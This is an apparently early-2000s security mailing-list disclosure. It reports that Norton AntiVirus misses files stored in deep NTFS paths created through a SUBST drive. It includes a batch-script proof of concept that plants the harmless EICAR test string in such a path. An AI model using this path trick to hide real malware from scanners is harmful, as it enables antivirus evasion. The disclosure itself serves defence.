> > > Long path exploit on NTFS > ===================== > The filesystem NTFS seems to be a hiding place for virusses if you use a file path which > exceeds 256 charaters. > > What is the case? > The filepath (drive + folderpath + filename) theoraticly can take up to 32000 charaters if > the filesystem in use is NTFS. However, the way in wich Windows NT (4.0, 2000 and > XP) access this filesystem a maximum of 256 characters is in place. If you try to go > deeper, you will experience a "Path too long" error. > In these Operating System there is a way to substitute a long folderpath, using > the "SUBST" command. If you change your current drive to the substituted drive, the > pathlength is reset to 3 (Q:\ e.g.) and Windows NT allows you to create an even deeper > path. > Normally this would not alarm anyone, however, i discovered that my favorite > virusscanner (Norton AntiVirus) was not able to follow the deep path where i created the > EICAR-test string. So i created a very simple batchfile to demonstrate this exploit. > My virusscanner will only find this virus is the SUBST drive is availible during the scan. > > I have tested this on the following platforms: > Windows NT 4.0 SP4 > Windows NT 4.0 SP6a > Windows 2000 Professional SP2 > Windows XP Pro > I have determined that the following versions of Norton AntiVirus will not follow > the deep path during a complete scan: > Norton AntiVirus 5.0 > Norton AntiVirus 7.5.1 > Norton Antivirus 8.00.58 > > I suspect that other virusscanners will encounter the same "bug" so you might try the > sample script that i created. Additionally, other tools (quotamanagers, inventory tools > etc) that gather information from a NTFS partition might reveal the same bug. > > After running the script below, remove the substituted drive (SUBST Q: /D) and run a > full scan on your C-partition. I suspect that the Eicar-virus will not be found. > Additionally, re-create the substituted drive and re-run the scan. Under normal conditions > the Eicar-virus will be found and removed (depending on your settings). > > As far as i can see, there is no real remedy against this exploit. I hope this message will > pass through the proper channels, so the responsible parties will act on this. > > Responses on this posting at my address are welcome. > > > Hans Somers (hans.somers@nl.abnamro.com) > > Sample script: > =========== > @echo off > cls > echo Start test-script NTFS-limit > @echo Create a filepath to the limit of NTFS > md > c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890 > \1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345 > 67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\ > 123456789 > cd > c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890 > \1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345 > 67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\ > 123456789 > @echo Create the Eicar test-string for PoC. This should be detected normally if you > have an active virusscanner. > echo > X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > >EICAR.TXT > echo. >>EICAR.TXT > @echo Activate the Eicar test-string > copy EICAR.TXT EICAR1.COM >NUL > @echo Create a subst-drive Q: for this path > subst Q: > c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890 > \1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345 > 67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\ > 123456789 > @echo Create e even deeper filepath (thus exceeding the limit of NTFS's explorer) > md Q:\1234567890\1234567890\1234567890 > @echo Change current folder into "the deep" > Q: > cd Q:\1234567890\1234567890\1234567890 > @echo Create the Eicar test-string > echo > X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > >EICAR.TXT > echo. >>EICAR.TXT > @echo Activate the Eicar test-string > copy EICAR.TXT EICAR2.COM >NUL > EICAR2.COM > echo . > echo End of test-script > > --------------------------------------------------------------------------- This message (including any attachments) is confidential and may be privileged. If you have received it by mistake please notify the sender by return e-mail and delete this message from your system. Any unauthorised use or dissemination of this message in whole or in part is strictly prohibited. Please note that e-mails are susceptible to change. ABN AMRO Bank N.V. (including its group companies) shall not be liable for the improper or incomplete transmission of the information contained in this communication nor for any delay in its receipt or damage to your system. ABN AMRO Bank N.V. (or its group companies) does not guarantee that the integrity of this communication has been maintained nor that this communication is free of viruses, interceptions or interference. ---------------------------------------------------------------------------
